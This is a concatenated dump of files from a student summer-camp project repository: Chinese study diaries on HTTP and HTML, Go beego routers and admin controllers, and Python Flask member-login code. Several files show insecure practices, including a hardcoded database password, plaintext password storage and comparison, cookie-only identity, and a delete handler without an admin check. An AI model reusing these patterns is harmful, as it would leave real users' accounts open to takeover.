7.18\n\n今天就是疯狂码代码,还算顺利,可以说算基本完成了吧,也可以说没完成,还差一个简陋的“猜你喜欢”功能的函数,现在的思路有点乱,想法有挺多,但总感觉不对。\n\n明日任务\n\n先测试代码,今天只是写完但没测,晚上的话争取完成“猜你喜欢”功能" }, { "alpha_fraction": 0.6978461742401123, "alphanum_fraction": 0.6996923089027405, "avg_line_length": 38.63414764404297, "blob_id": "0485f4466cb7f0e6095eb390e9fbaf6c2d8ef6ee", "content_id": "21f9d7f0929769d347a5c4a1b4bdadc39f2d409a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1637, "license_type": "no_license", "max_line_length": 95, "num_lines": 41, "path": "/Shixiaoyanger/market/routers/router.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"market/controllers\"\n\n\t\"github.com/astaxie/beego\"\n\t\n)\n\n//注册路由\nfunc init() {\n\tbeego.Router(\"/\", &controllers.MainController{})\n\tns := beego.NewNamespace(\"/v1\",\n\tbeego.NSNamespace(\"/users\",\n\t\tbeego.NSRouter(\"/register\", &controllers.UserController{}, \"post:Register\"),\n\t\tbeego.NSRouter(\"/login\", &controllers.UserController{}, \"post:Login\"),\n\t\tbeego.NSRouter(\"/logout\", &controllers.UserController{}, \"post:Logout\"),\n\t\tbeego.NSRouter(\"/update\", &controllers.UserController{}, \"post:Update\"),//update info\n\t//\tbeego.NSRouter(\"/info\",&controllers.UserController{},\"get:info\"),\n\n\n\n\t//\tbeego.NSRouter(\"/passwd\", &controllers.UserController{}, \"post:Passwd\"),\n\t//头像\n\t//\tbeego.NSRouter(\"/uploads\", &controllers.UserController{}, \"post:Uploads\"),\n\t//\tbeego.NSRouter(\"/downloads\", &controllers.UserController{}, \"get:Downloads\"),\n\t),\n\tbeego.NSNamespace(\"/goods\",\n//\t\tbeego.NSRouter(\"/:id\", &controllers.GoodsController{}, \"get:GetOne;put:Put;delete:Delete\"),\n//\t\tbeego.NSRouter(\"/\", &controllers.GoodsController{}, \"get:GetAll;post:Post\"),\n//\t\tbeego.NSRouter(\"/auth\", &controllers.GoodsController{}, \"post:Auth\"),\n\t\tbeego.NSRouter(\"/test\", &controllers.GoodsController{}, \"get:Test\"),\n\t\tbeego.NSRouter(\"/view/:id([0-9]+)\", &controllers.GoodsController{}, \"get:View\"),\n\t\tbeego.NSRouter(\"/view/popular\", &controllers.GoodsController{}, \"get:Popular\"),\n\t\tbeego.NSRouter(\"/view/latest\", &controllers.GoodsController{}, \"get:Latest\"),\n\t\tbeego.NSRouter(\"/add\", &controllers.GoodsController{}, \"post:Add\"),\n\t\tbeego.NSRouter(\"/search\", &controllers.GoodsController{}, \"post:Search\"),\n\t), \n)\nbeego.AddNamespace(ns)\n}\n" }, { "alpha_fraction": 0.6451612710952759, "alphanum_fraction": 0.6659132838249207, "avg_line_length": 31.446666717529297, "blob_id": "34cdeb2d21cd81aa4d7d947506d871e8c6860fc7", "content_id": "454afa647434d786f19232b4dc60d2b319fcc00a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9211, "license_type": "no_license", "max_line_length": 135, "num_lines": 150, "path": "/yixiaoer/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9周报\n\n## 今日计划\n1. 语言(Go)的学习\n2. 前端方面的学习\n\n## 完成情况\n 结合*Go Web*进行了解学习\n### **Web服务器的工作原理**简单归纳为:\n> 客户机通过TCP/IP协议建立到服务器的TCP连接\n> 客户端向服务器发送HTTP协议请求包,请求服务器里的资源文档\n> 服务器向客户机发送HTTP协议应答包,如果请求的资源包含有动态语言的内容,那么服务器会调用动态语言的解释引擎负责处理“动态内容”,并将处理得到的数据返回给客户端\n> 客户机与服务器断开。由客户端解释HTML文档,在客户端屏幕上渲染图形结果\n\n\n### 关于**http**\n1. 三个点\n> HTTP是无连接:即限制每次连接只处理一个请求,服务器处理完客户的请求,并收到客户的应答后,就断开连接,采用这种方式可节省传输时间\n> HTTP是媒体独立的:只要客户端和服务器知道如何处理的数据内容,任何类型的数据都可以通过HTTP发送,客户端以及服务器指定使用适合的MIME-type内容类型\n> HTTP是无状态:指协议对于事务处理没有记忆能力,缺少状态意味着如果后续处理需要前面的信息,则必须重传,这样可能导致每次连接传送的数据量增大;另一方面,在服务器不需要先前信息时它的应答就较快\n\n2. http消息结构\n* > (客户端请求消息 浏览器信息)客户端发送一个HTTP请求到服务器的请求消息包括以下格式:请求行(request line)、请求头部(header)、空行和请求数据(主体部分)四个部分组成\n ```\n GET /domains/example/ HTTP/1.1 //请求行: 请求方法 请求URI HTTP协议/协议版本\n Host:www.iana.org //服务端的主机名\n User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4 //浏览器信息\n Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 //客户端能接收的mine\n Accept-Encoding:gzip,deflate,sdch //是否支持流压缩\n Accept-Charset:UTF-8,*;q=0.5 //客户端字符编码集\n //空行,用于分割请求头和消息体\n //消息体,请求资源参数,例如POST传递的参数\n ```\n * http请求方法\n > 最基本的有4种,即GET、POST、PUT、DELETE\n > 一个URL地址用于描述一个网络上的资源,而HTTP中的GET、POST、 PUT、 DELETE就对应着对这个资源的查,改,增,删4个\n > 最常见的就是GET和POST,GET一般用于获取/查询资源信息,而POST一般用于更新资源信息\n* > (服务器响应消息 服务器信息)\n ```\n HTTP/1.1 200 OK //状态行\n Server: nginx/1.0.8 //服务器使用的WEB软件名及版本\n Date:Date: Tue, 30 Oct 2012 04:14:25 GMT //发送时间\n Content-Type: text/html //服务器发送信息的类型\n Transfer-Encoding: chunked //表示发送HTTP包是分段发的\n Connection: keep-alive //保持连接状态\n Content-Length: 90 //主体内容长度\n //空行 用来分割消息头和主体\n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"... //消息体\n ```\n * http状态码(三位数字组成,第一个数字定义了响应的类别)\n > 1XX 提示信息 - 表示请求已被成功接收,继续处理\n > 2XX 成功 - 表示请求已被成功接收,理解,接受\n > 3XX 重定向 - 要完成请求必须进行更进一步的处理\n > 4XX 客户端错误 - 请求有语法错误或请求无法实现\n > 5XX 服务器端错误 - 服务器未能实现合法的请求\n 常用:200(表示正常信息),302(表示跳转),301(资源(网页等)被永久转移到其它URL),404(请求的资源(网页等)不存在,500(内部服务器错误)\n\n3. “net/http”包(???感觉对于go的http包还是不太清楚...)\n (好了,不管了OTZ\n\n\n### 关于**HTML**\n1. HyperText Markup Language,超文本标记语言\n* 一种用于创建网页的标准标记语言(并非编程语言),是一套标机标签,用来描述网页\n* HTML文档包含了HTML标签及文本内容,也叫web页面\n* HTML标签(HTML tag),由尖括号围成的关键词,尽量小写,通常**成对**出现(eg.<b>和</b>,第一个是开始标签,第二个是结束标签);“HTML元素”和“HTML标签通常是描述一个意思,但严格说来元素包含了那一对标签\n* HTML属性通常以名称-值对的形式出现,可以在元素中添加附加信息,除属性值本身就含有双引号的情况下用单引号外,通常情况下属性值包括于双引号内,且尽量小写\n* for example:\n > <!DOCTYPE html> 声明为 HTML5 文档,不区分大小写\n > <html> 元素是 HTML 页面的根元素\n > <head> 元素包含了文档的元(meta)数据(如 <meta charset=\"utf-8\"> 定义网页编码格式为 utf-8)\n > <title> 元素描述了文档的标题\n > <body> 元素包含了可见的页面内容\n > <h1> 元素定义一个大标题\n > <p> 元素定义一个段落\n* 关于<head>元素,其中你可以插入脚本(scripts),样式文件(CSS),及各种meta信息,可以添加在头部区域的元素标签为: <title>, <style>, <meta>, <link>, <script>, <noscript>, and <base>\n * *<title> 元素*是必须的,它定义了浏览器工具栏的标题;当网页添加到收藏夹时,显示在收藏夹中的标题;显示在搜索引擎结果页面的标题\n * *<style>标签*定义了HTML文档的样式文件引用地址,也可以直接添加样式来渲染 HTML 文档\n * *<meta> 标签*通常用于指定网页的描述、关键词、文件的最后修改时间、作者、其他元数据,可以使用于浏览器(如何显示内容或重新加载页面),搜索引擎(关键词),或其他Web服务\n * *<link> 标签*定义了文档与外部资源之间的关系,通常用于链接到样式表\n * *<script>标签*用于加载脚本文件\n * *<base> 标签*描述了基本的链接地址/链接目标,该标签作为HTML文档中所有的链接标签的默认链接\n\n2. 几种定义\n* HTML标题(只用于标题,不要仅仅是为了生成粗体或大号的文本而使用标题)\n 通过<h1> - <h6> 来定义\n p.s. HTML水平线 <hr>\n p.p.s. HTML注释 <!--这是一个注释,在界面并不会显示-->\n* HTML段落通过<p>来定义\n p.s. HTML换行 <br> (没有成对出现的另一个)\n p.p.s 无法通过在 HTML 代码中添加额外的空格或换行来改变输出的效果\n* HTML链接通过<a>来定义\n ```\n <a href=\"url\">链接文本</a>\n ```\n p.s. 在“url”后使用 target 属性,可以定义被链接的文档在何处显示(\"_blank\"则连接在新窗口打开)\n p.p.s. id属性,可用于创建一个HTML文档书签标记\n ```\n * <a id=\"tips\">有用的提示部分</a> <!--在html文档中插入ID-->\n * <a href=\"#tips\">访问有用的提示部分</a> <!--在HTML文档中创建一个链接到\"有用的提示部分(id=\"tips\")\"-->\n * <a href=\"http://www.runoob.com/html/html-links.html#tips\">访问有用的提示部分</a> <!--从另一个页面创建一个链接到\"有用的提示部分(id=\"tips\")-->\n ```\n\n3. 表格\n* 由<table>标签来定义,每个表格均有若干行(由<tr>标签定义),每行被分割为若干单元格(由<td>标签定义,字母td指表格数据(table data),即数据单元格的内容),表头由<tr>标签进行定义\n* 若不定义边框属性,表格将不显示边框\n\n4. 列表\n* 无序列表是一个项目的列表,此列项目使用粗体圆点(典型的小黑圆圈)进行标记,使用 <ul> 标签\n* 有序列表也是一列项目,列表项目(整个列表)始于 <ol> 标签,用数字来标记且每个列表(项数字后的那一项)始于 <li> 标签,使用数字来标记\n\n5. 区块\n* 大多数 HTML 元素被定义为块级元素或内联元素,块级元素在浏览器显示时,通常会以新行来开始(和结束)(eg.<h1>, <p>, <ul>, <table>)\n\n6. 布局\n* <div>\n* <span>\n\n7. 表单(方便地进行客户端和服务器数据的交互)\n * 表单是一个包含表单元素(允许用户在表单中(比如:文本域、下拉列表、单选框、复选框等等)输入信息的元素)的区域,使用表单标签(\\)定义\n ```\n <form>\n ...\n input 元素\n ...\n </form>\n ```\n \n \n### 关于**CSS**\n* 指定文档(信息的集合)该如何呈现给用户的语言文档,是一门标记语言\n* CSS声明总是以分号(;)结束,声明组以大括号({})括起来,为使可读性更强,可以一行一个属性\n* 注解用\"/* \",\" */\"\n*(未完待续...)\n\n\n### 关于前后端分离\n* 路由(就像由URL到具体页面的一个映射,一个方法)\n* 端口(类似一一对应,来实现)\n* 用hmtl将前端大概布局,再<script>传送到js,再将前端数据发给后端,然后再进行处理;从后端传出,并将后端连接数据库(可以先明文存储密码,加密再说...)\n\n\nto be continued...\n明日继续...\n\n\n## 学习计划\n1. CSS/javascript\n2. 数据库(mango)\n3. 框架(试试echo叭)\n" }, { "alpha_fraction": 0.6750629544258118, "alphanum_fraction": 0.6750629544258118, "avg_line_length": 14.192307472229004, "blob_id": "3ad9a9c64b86ddd839bd65419398161dd4da8391", "content_id": "f4f80dae96aaa44c48dca55b62755b60ff2a8159", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 407, "license_type": "no_license", "max_line_length": 49, "num_lines": 26, "path": "/Shixiaoyanger/market/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t_ \"market/routers\"\n\t\"market/models\"\n\n\t\n\n\t\"github.com/astaxie/beego\"\n\t\"github.com/astaxie/beego/orm\"\n\t_ \"github.com/go-sql-driver/mysql\"\n)\nfunc init() {\n\t// 注册数据库\n\tmodels.RegisterDB() \n}\nfunc main() {\n\n\torm.Debug = true\n\tbeego.BConfig.WebConfig.Session.SessionOn = true\n//\tbeego.SetStaticPath(\"/static\",\"static\")\n\torm.RunSyncdb(\"default\", false, true) \n\t\n\tbeego.Run()\n\n}\n\n " }, { "alpha_fraction": 0.728863000869751, "alphanum_fraction": 0.728863000869751, "avg_line_length": 27.66666603088379, "blob_id": "b18c5a17ec7497144118e89d914c296ccfa5a077", "content_id": "f43f1ab5ee3c6de2ba052036ae0cbab2b133c49e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 343, "license_type": "no_license", "max_line_length": 90, "num_lines": 12, "path": "/jackwener/server/mall/routers/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"mall/controllers\"\n\t\"github.com/astaxie/beego\"\n)\n\nfunc init() {\n\tbeego.Router(\"/api/person\", &controllers.MainController{}, \"post:Login\")\n\tbeego.Router(\"/api/person/register\", &controllers.MainController{}, \"post:Register\")\n\tbeego.Router(\"/api/person/:user\", &controllers.MainController{}, \"get:Person;post:Login\")\n}" }, { "alpha_fraction": 0.5260653495788574, "alphanum_fraction": 0.5337194800376892, "avg_line_length": 29.402515411376953, "blob_id": "42707c2cf9be594a0511ea95749f189e3fd078b1", "content_id": "0e05a44048b3e8fa80c2194caef9c6759a5993b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4940, "license_type": "no_license", "max_line_length": 102, "num_lines": 159, "path": "/Old-Li883/热身任务代码/member2/model/member_operation.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import make_response\nimport json\nimport pymysql\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"member\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef mem_login(id, password):\n cursor.execute(\"select password from mem_info where id=%s\", id)\n accurate_pwd = cursor.fetchone()\n if accurate_pwd:\n if accurate_pwd[0] == password:\n rsp = make_response('hello')\n rsp.set_cookie('id', id) # 返回登录者id\n cursor.execute(\"select status from mem_info where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 1 and now_status[0] != 0: # 普通用户登录\n cursor.execute(\"update mem_info set status=3 where id=%s\", id)\n elif now_status[0] == 2 and now_status[0] != 0: # 管理员登录\n cursor.execute(\"update mem_info set status=4 where id=%s\", id)\n elif now_status[0] > 2: # 判断是否已经登录\n return \"you hava logined\"\n elif now_status[0] == 0: # 还未被认证的用户登录\n return \"you have not been identified\"\n db.commit()\n return rsp\n return 'id or password wrong'\n\n\ndef mem_register(id, password, name, email, groups):\n cursor.execute(\"select * from mem_info where id=%s||name=%s\", (\n id,\n name,\n ))\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into mem_info(id,name,password,email,groups,status) values(%s,%s,%s,%s,%s,0)\",\n (\n id,\n name,\n password,\n email,\n groups,\n ))\n db.commit()\n return \"you success register,wait for identify\"\n else:\n return \"the id or name have used\"\n\n\ndef find_no_register():\n cursor.execute(\"select * from mem_info where status=0\")\n no_register_mem = []\n find_mem = cursor.fetchall()\n for mem in find_mem:\n no_register_mem.append(mem)\n return json.dumps(no_register_mem)\n\n\ndef add_new_member(id, password, name, email, groups, status):\n cursor.execute(\"select * from mem_info where id=%s||name=%s\", (\n id,\n name,\n ))\n if cursor.fetchone() == (None):\n if status == 1:\n cursor.execute(\n \"insert into mem_info(id,name,password,email,groups,status) values(%s,%s,%s,%s,%s,1)\",\n (\n id,\n name,\n password,\n email,\n groups,\n ))\n elif status == 2:\n cursor.execute(\n \"insert into mem_info(id,name,password,email,groups,status) values(%s,%s,%s,%s,%s,2)\",\n (\n id,\n name,\n password,\n email,\n groups,\n ))\n db.commit()\n return \"you success add\"\n else:\n return \"the id or name have used\"\n\n\ndef delete_member(id):\n cursor.execute(\"select * from mem_info where id=%s\", id)\n if cursor.fetchone() == (None):\n return \"no this member\"\n cursor.execute(\"delete from mem_info where id=%s\", id)\n db.commit()\n return \"success delete this member\"\n\n\ndef change_member(id, password, name, email, groups):\n if password:\n cursor.execute(\"update mem_info set password=%s where id=%s\", (\n password,\n id,\n ))\n if name:\n cursor.execute(\"update mem_info set name=%s where id=%s\", (\n name,\n id,\n ))\n if email:\n cursor.execute(\"update mem_info set email=%s where id=%s\", (\n email,\n id,\n ))\n if groups:\n cursor.execute(\"update mem_info set groups=%s where id=%s\", (\n groups,\n id,\n ))\n db.commit()\n return \"you have successfully change this member's information\"\n\n\ndef find_all():\n cursor.execute(\"select * from mem_info\")\n members = []\n find_mem = cursor.fetchall()\n for mem in find_mem:\n members.append(mem)\n return json.dumps(members)\n\n\ndef group_member(groups):\n cursor.execute(\"select * from mem_info where groups=%s\", groups)\n members = []\n find_mem = cursor.fetchall()\n i = 0\n for mem in find_mem:\n if find_mem[i][5] != 0: # 未认证的不算组员\n members.append(mem)\n i += 1\n return json.dumps(members)\n\n\ndef mem_logout(id):\n cursor.execute(\"select status from mem_info where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 3: # 普通用户登出\n cursor.execute(\"update mem_info set status=1 where id=%s\", id)\n elif now_status[0] == 4: # 管理员登出\n cursor.execute(\"update mem_info set status=2 where id=%s\", id)\n resp = make_response(\"you have successfully logout\")\n resp.delete_cookie('id')\n db.commit()\n return resp\n" }, { "alpha_fraction": 0.5705623030662537, "alphanum_fraction": 0.5909591913223267, "avg_line_length": 30.824562072753906, "blob_id": "c61cac4f721fb4f0d14e37e8a84af83232a2e22f", "content_id": "b43116b270e1ea1761be07b73c08c6e59180c124", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 76, "num_lines": 57, "path": "/Old-Li883/mall/model/guys.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n所有人的操作\n登录和登出\n\"\"\"\n\nimport pymysql\nfrom flask import make_response\nfrom werkzeug.security import check_password_hash\nfrom util.response import response\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef login(id, pwd, status):\n \"\"\"\n client 成功只验证了未认证的失败和验证了的成功这两个示例\n \"\"\"\n if status == '1': # 登录时三种用户分开登录\n cursor.execute(\"select identify from client where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 0: # 判断是否被认证通过\n return response(400, \"have not been identify\")\n else:\n cursor.execute(\"select password from client where id=%s\", id)\n elif status == '2':\n cursor.execute(\"select identify from merchant where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 0:\n return response(400, \"have not been identify\")\n else:\n cursor.execute(\"select password from merchant where id=%s\", id)\n elif status == '3':\n cursor.execute(\"select identify from administrator where id=%s\", id)\n now_status = cursor.fetchone()\n if now_status[0] == 0:\n return response(400, \"have not been identify\")\n else:\n cursor.execute(\"select password from administrator where id=%s\",\n id)\n accurate_pwd = cursor.fetchone()\n if accurate_pwd != ():\n if check_password_hash(accurate_pwd[0], pwd):\n rsp = make_response('{\"status\":\"200\"}')\n rsp.set_cookie('id', id) # 返回登录者id\n return rsp\n else:\n return response(401, \"password_wrong\")\n else:\n return response(402, \"id_wrong\")\n\n\ndef logout():\n resp = make_response(\"{'status': 200}\")\n resp.delete_cookie('id')\n return resp\n" }, { "alpha_fraction": 0.8246753215789795, "alphanum_fraction": 0.8636363744735718, "avg_line_length": 21.14285659790039, "blob_id": "5e7dcca2ea3138e37337c73104bd8c84efe6ca00", "content_id": "9e8bde46d7edf67355e9fffca88998de9729a235", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 374, "license_type": "no_license", "max_line_length": 51, "num_lines": 7, "path": "/Shixiaoyanger/日报/7.21.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.21日报\n\n1.今天把slice和map重新看了一下 利用range和for循环将多个数据取出来了\n\n2.在文杰的提醒下重构了返回信息,你多个结构体实现了同时返回具体信息和状态信息的格式统一的json数组\n\n3.利用数据库的高级操作和原生语句,实现了商品浏览量的统计,以及热门查询的有关操作" }, { "alpha_fraction": 0.6470391154289246, "alphanum_fraction": 0.6474860310554504, "avg_line_length": 23.389646530151367, "blob_id": "d799cbc743394e54eb0b2ce4fa780712c3b344ea", "content_id": "d2c3407a21bbd44c7d745d24079c968d93ef58e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 9512, "license_type": "no_license", "max_line_length": 145, "num_lines": 367, "path": "/jackwener/server/练手/controllers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"hello/models/class\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"fmt\"\n\t\"hello/models\"\n\t\"encoding/json\"\n\t\"hello/encryptions\"\n\t\"strings\"\n)\n\n// 通过路由/manager/apply,发送get请求就能返回所有身份为\"apply\"(申请者)的Json数据\nfunc (c *UserController) ListApply(){\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar posts []class.User\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Filter(\"status\",\"apply\").All(&posts, \"id\", \"name\", \"nickname\", \"email\", \"phone\", \"group\", \"status\")\n\tfmt.Println(posts)\n\tu := models.Info{User:posts,Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\n// 通过路由/manager/apply,发送post请求,通过请求中Json的User[]的id,可以批量批准Json中Use[]成员的注册\n// 即将\"status\"由\"apply\"改为\"stuff\"\nfunc (c *UserController) UpdateApply() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tusers := ob.User\n\to := orm.NewOrm()\n\tfor _, user := range users{\n\t\tid := user.Id\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"status\": \"stuff\"})\n\t}\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\n// 通过路由/manager/user,发送get请求,就能返回所有非\"apply\"成员的信息的Json数据\nfunc (c *UserController) UserList() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar posts []class.User\n\to := orm.NewOrm()\n\to.QueryTable(\"user\").Exclude(\"status\",\"apply\").All(&posts, \"id\", \"name\", \"nickname\", \"email\", \"phone\", \"group\", \"status\")\n\tfmt.Println(posts)\n\tu := models.Info{User:posts,Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc(c *UserController) PageUserAdd() {\n\tCheckLogin(c)\n}\n\n// 通过路由/manager/user/add,发送post请求,批量添加Json中User[]的用户\n// 管理员添加用户默认为\"staff\",添加不可指定id,避免冲突\nfunc(c *UserController) UserAdd() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tusers := ob.User\n\tfor _, user := range users {\n\t\tuser.Status = \"staff\"\n\t\tuser.Password = encryptions.Salt(user.Password)\n\t}\n\to := orm.NewOrm()\n\tqs := o.QueryTable(\"user\")\n\ti, _ := qs.PrepareInsert()\n\tfor _, user := range users {\n\t\tid, err := i.Insert(&user)\n\t\tif err == nil {\n\t\t\tfmt.Println(id)\n\t\t}\n\t}\n\ti.Close() // 不要忘记关闭 statement\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc (c *UserController) PageUserDelete(){\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n}\n\n// 通过路由/manager/user/delete,发送post请求,通过读取请求Json中User[]的id值,批量删除Json中User[]的用户\nfunc (c *UserController) UserDelete(){\n\tCheckLogin(c)\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\to := orm.NewOrm()\n\tusers := ob.User\n\tfor _, user := range users {\n\t\tid := user.Id\n\t\tif num, err := o.QueryTable(\"user\").Filter(\"id\", id).Delete(); err == nil {\n\t\t\tfmt.Println(num)\n\t\t}\n\t}\n\tu := models.Info{Result:true}\n\tc.Data[\"json\"] = u\n\tc.ServeJSON()\n}\n\nfunc (c *UserController) PageUserUpdate() {\n\tCheckLogin(c)\n}\n\n// 通过路由/manager/user/update,发送post请求,默认通过读取请求Json中User[0]的id值,单个更新Json中User[]的用户\n// 不可更新id值\nfunc (c *UserController) UserUpdate() {\n\terr := c.GetSession(\"userPermission\")\n\tfmt.Print(err)\n\tif err == nil{\n\t\tfmt.Printf(\"没有session\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if !strings.Contains(c.GetSession(\"userPermission\").(string), \"admin\") {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"没权限\")\n\t\tu := models.Info{}\n\t\tu.Result = false\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t\treturn\n\t} else {\n\t\tfmt.Printf(c.GetSession(\"userPermission\").(string))\n\t\tfmt.Printf(\"有权限\")\n\t\tu := models.Info{}\n\t\tu.Result = true\n\t\tc.Data[\"json\"] = u\n\t\tc.ServeJSON()\n\t}\n\n\tvar ob models.Info\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\to := orm.NewOrm()\n\tuser := ob.User[0]\n\tid := user.Id\n\tif user.Status !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"status\": user.Status})\n\t}\n\tif user.Name !=\"\" {\n\t\to.QueryTable(\"user\").Filter(\"id\", id).Update(orm.Params{\"name\": 